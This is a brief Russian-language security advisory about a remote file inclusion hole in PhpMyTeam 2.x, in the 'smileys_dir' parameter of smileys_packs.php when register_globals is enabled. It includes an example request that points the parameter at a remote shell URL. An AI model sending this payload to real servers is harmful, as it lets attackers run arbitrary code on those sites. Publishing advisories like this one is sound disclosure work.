Программа: PhpMyTeam 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "smileys_dir" сценарием images/smileys/smileys_packs.php.

Успешное эксплуатирование уязвимости требует включение опции "register_globals".

Пример:

/images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?

Оставить мнение